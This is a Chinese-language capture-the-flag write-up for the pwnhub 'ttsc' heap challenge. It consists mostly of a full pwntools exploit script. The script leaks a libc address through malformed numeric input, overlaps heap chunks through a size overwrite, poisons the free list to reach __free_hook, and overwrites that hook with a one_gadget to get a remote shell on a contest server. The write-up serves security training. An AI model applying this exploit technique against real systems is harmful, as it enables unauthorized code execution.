pwnhub三月 ttsc
拿到邀请码发现内部赛打不了,只能等比赛结束做了。
这里最大的坑就是有延迟,需要sleep来等一下,不然瞎发送
漏洞点很简单,可以直接覆盖size
但是次数都很少,正常打起来太麻烦了,但是开头给了三次输入功能
一开始以为没什么用,在随便输的时候发现-可以直接泄露出地址
age这里是lodword(v8),然后v2那里是hidwod,直接泄露出age这里的地址,发现是_IO_file_jumps
进一步获取libc,拿到libc之后就直接利用上面的漏洞打堆重叠,然后打fd到hook,打hook为ogg就行了
from pwn import *
from time import sleep
context(arch='amd64', os='linux', log_level='debug')
file_name = './ttsc'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
context.terminal = ['tmux','splitw','-h']
debug = 1
if debug:
r = remote('121.40.89.206', 20111)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
def dbgg():
raw_input()
menu = 'chs:'
def add(index, size, content):
r.sendlineafter(menu, '1')
sleep(0.2)
r.sendlineafter('index?', str(index))
sleep(0.2)
r.sendlineafter('size:', str(size))
sleep(0.2)
r.send(content)
sleep(0.2)
def delete(index):
r.sendlineafter(menu, '2')
sleep(0.2)
r.sendlineafter('index?', str(index))
sleep(0.2)
def edit(index, content):
r.sendlineafter(menu, '3')
sleep(0.2)
r.sendlineafter('index?', str(index))
sleep(0.2)
r.sendlineafter('content:', content)
sleep(0.2)
dbgg()
r.sendlineafter('what is your name?', 'a')
r.sendlineafter('age?', '-')
r.sendlineafter('high?', '-')
r.recvuntil('age: ')
leak_addr = int(r.recv(10), 10) + 0x100000000
li('leak_addr = ' + hex(leak_addr))
r.recvuntil('high: ')
leak_addr2 = int(r.recv(6), 10)
li('leak_addr2 = ' + hex(leak_addr2))
leak_addr = (leak_addr2 << 32) | leak_addr
li('leak_addr = ' + hex(leak_addr))
libc = ELF('./2.27/libc-2.27.so')
libc_base = leak_addr - libc.sym['_IO_file_jumps']
li('libc_base = ' + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
one = [0x4f2a5, 0x4f302, 0x10a2fc]
one_gadget = one[1] + libc_base
add(0, 0x18, 'a' * 8)
add(1, 0x18, 'a' * 8)
add(2, 0x18, 'a' * 8)
p1 = p64(0) * 3 + p64(0x41)
edit(0, p1)
r.sendline('')
delete(0)
delete(2)
delete(1)
p2 = p64(0) * 3 + p64(0x21) + p64(free_hook)
add(0, 0x30, p2)
add(1, 0x18, 'a' * 8)
add(2, 0x18, p64(one_gadget))
delete(0)
r.interactive()